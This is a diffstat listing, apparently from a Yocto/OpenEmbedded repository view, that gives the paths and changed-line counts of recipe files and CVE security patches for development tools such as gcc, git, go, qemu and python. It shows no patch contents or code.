-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0034-fix-segmentation-fault-in-precompiled-header-generat.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0034-fix-segmentation-fault-in-precompiled-header-generat.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0035-Fix-for-testsuite-failure.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0035-Fix-for-testsuite-failure.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0036-Re-introduce-spe-commandline-options.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0036-Re-introduce-spe-commandline-options.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0037-CVE-2019-14250-Check-zero-value-in-simple_object_elf.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0037-CVE-2019-14250-Check-zero-value-in-simple_object_elf.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0038-gentypes-genmodes-Do-not-use-__LINE__-for-maintainin.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0038-gentypes-genmodes-Do-not-use-__LINE__-for-maintainin.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0039-process_alt_operands-Don-t-match-user-defined-regs-o.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0039-process_alt_operands-Don-t-match-user-defined-regs-o.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/CVE-2023-4039.patch1506
-rw-r--r--meta/recipes-devtools/gcc/gcc-common.inc3
-rw-r--r--meta/recipes-devtools/gcc/gcc-cross-canadian_9.5.bb (renamed from meta/recipes-devtools/gcc/gcc-cross-canadian_9.3.bb)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-cross_9.5.bb (renamed from meta/recipes-devtools/gcc/gcc-cross_9.3.bb)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-crosssdk_9.5.bb (renamed from meta/recipes-devtools/gcc/gcc-crosssdk_9.3.bb)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-runtime_9.5.bb (renamed from meta/recipes-devtools/gcc/gcc-runtime_9.3.bb)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-sanitizers_9.5.bb (renamed from meta/recipes-devtools/gcc/gcc-sanitizers_9.3.bb)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-shared-source.inc3
-rw-r--r--meta/recipes-devtools/gcc/gcc-source.inc1
-rw-r--r--meta/recipes-devtools/gcc/gcc-source_9.5.bb (renamed from meta/recipes-devtools/gcc/gcc-source_9.3.bb)0
-rw-r--r--meta/recipes-devtools/gcc/gcc_9.5.bb (renamed from meta/recipes-devtools/gcc/gcc_9.3.bb)0
-rw-r--r--meta/recipes-devtools/gcc/libgcc-initial_9.5.bb (renamed from meta/recipes-devtools/gcc/libgcc-initial_9.3.bb)0
-rw-r--r--meta/recipes-devtools/gcc/libgcc_9.5.bb (renamed from meta/recipes-devtools/gcc/libgcc_9.3.bb)0
-rw-r--r--meta/recipes-devtools/gcc/libgfortran_9.5.bb (renamed from meta/recipes-devtools/gcc/libgfortran_9.3.bb)0
-rw-r--r--meta/recipes-devtools/gdb/gdb-9.1.inc1
-rw-r--r--meta/recipes-devtools/gdb/gdb-common.inc1
-rw-r--r--meta/recipes-devtools/gdb/gdb/0012-CVE-2023-39128.patch75
-rw-r--r--meta/recipes-devtools/git/files/CVE-2021-40330.patch108
-rw-r--r--meta/recipes-devtools/git/files/CVE-2022-23521.patch367
-rw-r--r--meta/recipes-devtools/git/files/CVE-2022-41903-01.patch39
-rw-r--r--meta/recipes-devtools/git/files/CVE-2022-41903-02.patch187
-rw-r--r--meta/recipes-devtools/git/files/CVE-2022-41903-03.patch146
-rw-r--r--meta/recipes-devtools/git/files/CVE-2022-41903-04.patch150
-rw-r--r--meta/recipes-devtools/git/files/CVE-2022-41903-05.patch98
-rw-r--r--meta/recipes-devtools/git/files/CVE-2022-41903-06.patch90
-rw-r--r--meta/recipes-devtools/git/files/CVE-2022-41903-07.patch123
-rw-r--r--meta/recipes-devtools/git/files/CVE-2022-41903-08.patch67
-rw-r--r--meta/recipes-devtools/git/files/CVE-2022-41903-09.patch162
-rw-r--r--meta/recipes-devtools/git/files/CVE-2022-41903-10.patch99
-rw-r--r--meta/recipes-devtools/git/files/CVE-2022-41903-11.patch90
-rw-r--r--meta/recipes-devtools/git/files/CVE-2022-41903-12.patch124
-rw-r--r--meta/recipes-devtools/git/files/CVE-2023-22490-1.patch179
-rw-r--r--meta/recipes-devtools/git/files/CVE-2023-22490-2.patch122
-rw-r--r--meta/recipes-devtools/git/files/CVE-2023-22490-3.patch154
-rw-r--r--meta/recipes-devtools/git/files/CVE-2023-23946.patch184
-rw-r--r--meta/recipes-devtools/git/files/CVE-2023-25652.patch94
-rw-r--r--meta/recipes-devtools/git/files/CVE-2023-29007.patch159
-rw-r--r--meta/recipes-devtools/git/git.inc35
-rw-r--r--meta/recipes-devtools/git/git/fixsort.patch36
-rw-r--r--meta/recipes-devtools/git/git_2.24.4.bb (renamed from meta/recipes-devtools/git/git_2.24.3.bb)4
-rw-r--r--meta/recipes-devtools/glide/glide_0.13.3.bb5
-rw-r--r--meta/recipes-devtools/gnu-config/gnu-config_git.bb3
-rw-r--r--meta/recipes-devtools/go/go-1.14.inc110
-rw-r--r--meta/recipes-devtools/go/go-1.14/0001-CVE-2022-32190.patch74
-rw-r--r--meta/recipes-devtools/go/go-1.14/0002-CVE-2022-32190.patch48
-rw-r--r--meta/recipes-devtools/go/go-1.14/0003-CVE-2022-32190.patch36
-rw-r--r--meta/recipes-devtools/go/go-1.14/0004-CVE-2022-32190.patch82
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2020-29510.patch65
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2021-27918.patch191
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2021-31525.patch38
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2021-33195.patch373
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2021-33196.patch124
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2021-33197.patch152
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2021-33198.patch113
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2021-34558.patch51
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2021-36221.patch101
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2021-38297.patch97
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2021-39293.patch79
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2021-41771.patch86
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2021-44716.patch93
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2021-44717.patch83
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-1962.patch357
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-23772.patch50
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-23806.patch142
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-24675.patch271
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-24921.patch198
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-27664.patch68
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-28131.patch104
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-28327.patch36
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-2879.patch111
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-2880.patch164
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-30629.patch47
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-30631.patch116
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-30632.patch71
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-30633.patch131
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-30635.patch120
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-32148.patch49
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-32189.patch113
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-41715.patch271
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-41717.patch75
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-41722-1.patch53
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-41722-2.patch104
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-41723.patch156
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre1.patch85
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre2.patch97
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre3.patch98
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-41725.patch660
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-24534.patch200
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-24536_1.patch134
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-24536_2.patch184
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-24536_3.patch349
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-24537.patch76
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-24538-1.patch125
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-24538-2.patch635
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-24538_3.patch393
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-24538_4.patch497
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-24538_5.patch585
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-24538_6.patch371
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-24539.patch60
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-24540.patch90
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-29400.patch94
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-29402.patch201
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-29404.patch84
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-29405-1.patch112
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-29405-2.patch38
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-29406-1.patch212
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-29406-2.patch114
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-29409.patch175
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-39318.patch262
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-39319.patch230
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-39326.patch181
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre1.patch393
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre2.patch401
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre3.patch86
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-45287.patch1697
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-45289.patch121
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-45290.patch271
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2024-24784.patch205
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2024-24785.patch197
-rw-r--r--meta/recipes-devtools/go/go-crosssdk.inc2
-rw-r--r--meta/recipes-devtools/go/go-dep_0.5.4.bb2
-rw-r--r--meta/recipes-devtools/go/go_1.14.bb10
-rw-r--r--meta/recipes-devtools/help2man/help2man-native_1.47.11.bb3
-rw-r--r--meta/recipes-devtools/i2c-tools/i2c-tools_4.1.bb1
-rw-r--r--meta/recipes-devtools/icecc-toolchain/nativesdk-icecc-toolchain_0.1.bb1
-rw-r--r--meta/recipes-devtools/intltool/intltool_0.51.0.bb2
-rw-r--r--meta/recipes-devtools/jquery/jquery_3.5.0.bb6
-rw-r--r--meta/recipes-devtools/libcomps/libcomps_0.1.15.bb4
-rw-r--r--meta/recipes-devtools/libdnf/libdnf/0040-Mark-job-goal.upgrade-with-sltr-as-target.patch58
-rw-r--r--meta/recipes-devtools/libdnf/libdnf_0.28.1.bb5
-rw-r--r--meta/recipes-devtools/libmodulemd/libmodulemd-v1_git.bb2
-rw-r--r--meta/recipes-devtools/librepo/librepo/CVE-2020-14352.patch55
-rw-r--r--meta/recipes-devtools/librepo/librepo_1.11.2.bb5
-rw-r--r--meta/recipes-devtools/libtool/libtool-2.4.6.inc4
-rw-r--r--meta/recipes-devtools/libtool/libtool/0001-Makefile.am-make-sure-autoheader-run-before-autoconf.patch35
-rw-r--r--meta/recipes-devtools/libtool/libtool/0001-Makefile.am-make-sure-autoheader-run-before-automake.patch35
-rw-r--r--meta/recipes-devtools/libtool/libtool/lto-prefix.patch22
-rw-r--r--meta/recipes-devtools/libtool/libtool_2.4.6.bb2
-rw-r--r--meta/recipes-devtools/llvm/llvm/0001-AsmMatcherEmitter-sort-ClassInfo-lists-by-name-as-we.patch31
-rw-r--r--meta/recipes-devtools/llvm/llvm_git.bb10
-rw-r--r--meta/recipes-devtools/m4/m4-1.4.18.inc1
-rw-r--r--meta/recipes-devtools/m4/m4/0001-c-stack-stop-using-SIGSTKSZ.patch84
-rw-r--r--meta/recipes-devtools/makedevs/makedevs_1.0.1.bb1
-rw-r--r--meta/recipes-devtools/mklibs/files/remove-deprecated-exception-specification-cpp17.patch431
-rw-r--r--meta/recipes-devtools/mklibs/mklibs-native_0.1.44.bb1
-rw-r--r--meta/recipes-devtools/mmc/mmc-utils_git.bb1
-rw-r--r--meta/recipes-devtools/mtd/mtd-utils/0001-mtd-utils-Fix-return-value-of-ubiformat.patch62
-rw-r--r--meta/recipes-devtools/mtd/mtd-utils_git.bb14
-rw-r--r--meta/recipes-devtools/nasm/nasm/0002-Add-debug-prefix-map-option.patch42
-rw-r--r--meta/recipes-devtools/nasm/nasm/CVE-2022-44370.patch104
-rw-r--r--meta/recipes-devtools/nasm/nasm_2.15.05.bb (renamed from meta/recipes-devtools/nasm/nasm_2.15.03.bb)7
-rw-r--r--meta/recipes-devtools/ninja/ninja_1.10.0.bb6
-rw-r--r--meta/recipes-devtools/opkg/opkg/0001-file_util.c-fix-possible-bad-memory-access-in-file_r.patch50
-rw-r--r--meta/recipes-devtools/opkg/opkg/sourcedateepoch.patch24
-rw-r--r--meta/recipes-devtools/opkg/opkg_0.4.2.bb7
-rw-r--r--meta/recipes-devtools/orc/orc_0.4.31.bb1
-rw-r--r--meta/recipes-devtools/patch/patch/CVE-2019-20633.patch31
-rw-r--r--meta/recipes-devtools/patch/patch_2.7.6.bb1
-rw-r--r--meta/recipes-devtools/patchelf/patchelf_0.10.bb11
-rw-r--r--meta/recipes-devtools/perl/files/CVE-2023-31484.patch27
-rw-r--r--meta/recipes-devtools/perl/files/CVE-2023-47038.patch121
-rw-r--r--meta/recipes-devtools/perl/libmodule-build-perl_0.4231.bb1
-rw-r--r--meta/recipes-devtools/perl/libxml-parser-perl_2.46.bb1
-rw-r--r--meta/recipes-devtools/perl/perl_5.30.1.bb12
-rw-r--r--meta/recipes-devtools/pkgconfig/pkgconfig_git.bb2
-rw-r--r--meta/recipes-devtools/pseudo/files/0001-Add-statx.patch106
-rw-r--r--meta/recipes-devtools/pseudo/files/0001-maketables-wrappers-use-Python-3.patch34
-rw-r--r--meta/recipes-devtools/pseudo/files/0001-pseudo-On-a-DB-fixup-remove-files-that-do-not-exist-.patch49
-rw-r--r--meta/recipes-devtools/pseudo/files/0001-pseudo_ipc.h-Fix-enum-typedef.patch31
-rw-r--r--meta/recipes-devtools/pseudo/files/0001-realpath.c-Remove-trailing-slashes.patch57
-rw-r--r--meta/recipes-devtools/pseudo/files/0006-xattr-adjust-for-attr-2.4.48-release.patch48
-rwxr-xr-xmeta/recipes-devtools/pseudo/files/build-oldlibc20
-rw-r--r--meta/recipes-devtools/pseudo/files/moreretries.patch19
-rw-r--r--meta/recipes-devtools/pseudo/files/older-glibc-symbols.patch57
-rw-r--r--meta/recipes-devtools/pseudo/files/seccomp.patch137
-rw-r--r--meta/recipes-devtools/pseudo/files/toomanyfiles.patch71
-rw-r--r--meta/recipes-devtools/pseudo/files/xattr_version.patch54
-rw-r--r--meta/recipes-devtools/pseudo/pseudo.inc14
-rw-r--r--meta/recipes-devtools/pseudo/pseudo_git.bb21
-rw-r--r--meta/recipes-devtools/python-numpy/python-numpy.inc2
-rw-r--r--meta/recipes-devtools/python/files/0001-bpo-39503-CVE-2020-8492-Fix-AbstractBasicAuthHandler.patch248
-rw-r--r--meta/recipes-devtools/python/python-setuptools.inc2
-rw-r--r--meta/recipes-devtools/python/python3-jinja2_2.11.3.bb (renamed from meta/recipes-devtools/python/python3-jinja2_2.11.2.bb)5
-rw-r--r--meta/recipes-devtools/python/python3-magic_0.4.15.bb7
-rw-r--r--meta/recipes-devtools/python/python3-pip/CVE-2021-3572.patch48
-rw-r--r--meta/recipes-devtools/python/python3-pip_20.0.2.bb1
-rw-r--r--meta/recipes-devtools/python/python3-pycairo_1.19.0.bb2
-rw-r--r--meta/recipes-devtools/python/python3-pygobject_3.34.0.bb2
-rw-r--r--meta/recipes-devtools/python/python3-scons_3.1.2.bb1
-rw-r--r--meta/recipes-devtools/python/python3-setuptools/CVE-2022-40897.patch29
-rw-r--r--meta/recipes-devtools/python/python3/0001-bpo-36852-proper-detection-of-mips-architecture-for-.patch42
-rw-r--r--meta/recipes-devtools/python/python3/0001-test_ctypes.test_find-skip-without-tools-sdk.patch33
-rw-r--r--meta/recipes-devtools/python/python3/0001-test_locale.py-correct-the-test-output-format.patch24
-rw-r--r--meta/recipes-devtools/python/python3/CVE-2020-14422.patch77
-rw-r--r--meta/recipes-devtools/python/python3/CVE-2020-26116.patch104
-rw-r--r--meta/recipes-devtools/python/python3/CVE-2020-27619.patch70
-rw-r--r--meta/recipes-devtools/python/python3/CVE-2023-24329.patch80
-rw-r--r--meta/recipes-devtools/python/python3/makerace.patch23
-rw-r--r--meta/recipes-devtools/python/python3/python3-manifest.json4
-rw-r--r--meta/recipes-devtools/python/python3_3.8.18.bb (renamed from meta/recipes-devtools/python/python3_3.8.2.bb)40
-rw-r--r--meta/recipes-devtools/qemu/qemu-system-native_4.2.0.bb2
-rw-r--r--meta/recipes-devtools/qemu/qemu.inc163
-rw-r--r--meta/recipes-devtools/qemu/qemu/0012-fix-libcap-header-issue-on-some-distro.patch9
-rw-r--r--meta/recipes-devtools/qemu/qemu/0012-util-cacheinfo-fix-crash-when-compiling-with-uClibc.patch48
-rw-r--r--meta/recipes-devtools/qemu/qemu/9pfs-local-ignore-O_NOATIME-if-we-don-t-have-permiss.patch63
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-12829_1.patch164
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-12829_2.patch139
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-12829_3.patch47
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-12829_4.patch100
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-12829_5.patch266
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-13253_1.patch50
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-13253_2.patch112
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-13253_3.patch86
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-13253_4.patch139
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-13253_5.patch54
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-13754-1.patch91
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-13754-2.patch69
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-13754-3.patch65
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-13754-4.patch39
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-13791.patch44
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-15469-1.patch50
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-15469-2.patch69
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-15469-3.patch49
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-15469-4.patch53
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-15469-5.patch53
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-15469-6.patch61
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-15469-7.patch50
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-15469-8.patch44
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-15859.patch39
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-24165.patch94
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-25085.patch46
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-25624_1.patch87
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-25624_2.patch101
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-25625.patch42
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-25723.patch52
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-27617.patch49
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-27821.patch73
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-28916.patch48
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-29443.patch45
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-35504.patch51
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-35505.patch45
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-20181.patch81
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-20196.patch62
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-20203.patch74
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-20221.patch67
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-20257.patch55
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3392.patch92
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3409-1.patch85
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3409-2.patch103
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3409-3.patch71
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3409-4.patch52
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3409-5.patch93
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3416_1.patch177
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3416_10.patch41
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3416_2.patch42
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3416_3.patch43
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3416_5.patch42
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3416_6.patch40
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3416_7.patch42
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3416_8.patch44
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3416_9.patch41
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3507.patch87
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3527-1.patch42
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3527-2.patch59
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3544.patch29
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3544_2.patch39
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3544_3.patch39
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3544_4.patch46
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3544_5.patch47
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3545.patch41
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3546.patch47
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3582.patch47
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3607.patch43
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3608.patch40
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3638.patch80
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3682.patch41
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3713.patch67
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3748.patch124
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3750.patch180
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3929.patch81
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3930.patch53
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-4206.patch89
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-4207.patch43
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2022-0216-1.patch42
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2022-0216-2.patch52
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2022-26354.patch57
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2022-35414.patch53
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2022-4144.patch103
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2023-0330.patch77
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2023-2861.patch178
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2023-3180.patch49
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2023-3354.patch87
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2023-5088.patch114
-rw-r--r--meta/recipes-devtools/qemu/qemu/hw-block-nvme-handle-dma-errors.patch146
-rw-r--r--meta/recipes-devtools/qemu/qemu/hw-block-nvme-refactor-nvme_addr_read.patch55
-rw-r--r--meta/recipes-devtools/qemu/qemu/hw-display-qxl-Pass-requested-buffer-size-to-qxl_phy.patch236
-rw-r--r--meta/recipes-devtools/qemu/qemu_4.2.0.bb5
-rw-r--r--meta/recipes-devtools/quilt/quilt.inc3
-rw-r--r--meta/recipes-devtools/quilt/quilt/faildiff-order.patch41
-rw-r--r--meta/recipes-devtools/rpm/files/0001-rpm-rpmio.c-restrict-virtual-memory-usage-if-limit-s.patch25
-rw-r--r--meta/recipes-devtools/rpm/files/0001-rpmio-Fix-lzopen_internal-mode-parsing-when-Tn-is-us.patch34
-rw-r--r--meta/recipes-devtools/rpm/files/CVE-2021-20266.patch109
-rw-r--r--meta/recipes-devtools/rpm/files/CVE-2021-3421.patch197
-rw-r--r--meta/recipes-devtools/rpm/files/CVE-2021-3521-01.patch60
-rw-r--r--meta/recipes-devtools/rpm/files/CVE-2021-3521-02.patch55
-rw-r--r--meta/recipes-devtools/rpm/files/CVE-2021-3521-03.patch34
-rw-r--r--meta/recipes-devtools/rpm/files/CVE-2021-3521.patch330
-rw-r--r--meta/recipes-devtools/rpm/rpm_4.14.2.1.bb12
-rw-r--r--meta/recipes-devtools/rsync/files/0001-Fix-relative-when-copying-an-absolute-path.patch31
-rw-r--r--meta/recipes-devtools/rsync/files/CVE-2022-29154.patch334
-rw-r--r--meta/recipes-devtools/rsync/rsync_3.1.3.bb3
-rw-r--r--meta/recipes-devtools/ruby/ruby.inc4
-rw-r--r--meta/recipes-devtools/ruby/ruby/0001-template-Makefile.in-do-not-write-host-cross-cc-item.patch32
-rw-r--r--meta/recipes-devtools/ruby/ruby/CVE-2020-25613.patch40
-rw-r--r--meta/recipes-devtools/ruby/ruby/CVE-2021-33621.patch139
-rw-r--r--meta/recipes-devtools/ruby/ruby/CVE-2023-28756.patch61
-rw-r--r--meta/recipes-devtools/ruby/ruby_2.7.6.bb (renamed from meta/recipes-devtools/ruby/ruby_2.7.1.bb)12
-rwxr-xr-xmeta/recipes-devtools/run-postinsts/run-postinsts/run-postinsts10
-rw-r--r--meta/recipes-devtools/run-postinsts/run-postinsts/run-postinsts.service2
-rw-r--r--meta/recipes-devtools/run-postinsts/run-postinsts_1.0.bb1
-rw-r--r--meta/recipes-devtools/squashfs-tools/files/CVE-2021-40153.patch253
-rw-r--r--meta/recipes-devtools/squashfs-tools/squashfs-tools_git.bb5
-rwxr-xr-xmeta/recipes-devtools/strace/strace/run-ptest2
-rw-r--r--meta/recipes-devtools/strace/strace_5.5.bb1
-rw-r--r--meta/recipes-devtools/subversion/subversion/CVE-2020-17525.patch117
-rw-r--r--meta/recipes-devtools/subversion/subversion/CVE-2021-28544.patch146
-rw-r--r--meta/recipes-devtools/subversion/subversion_1.13.0.bb3
-rw-r--r--meta/recipes-devtools/swig/swig/determinism.patch19
-rw-r--r--meta/recipes-devtools/swig/swig_3.0.12.bb1
-rw-r--r--meta/recipes-devtools/syslinux/syslinux/determinism.patch22
-rw-r--r--meta/recipes-devtools/syslinux/syslinux_6.04-pre2.bb6
-rw-r--r--meta/recipes-devtools/systemd-bootchart/systemd-bootchart_233.bb8
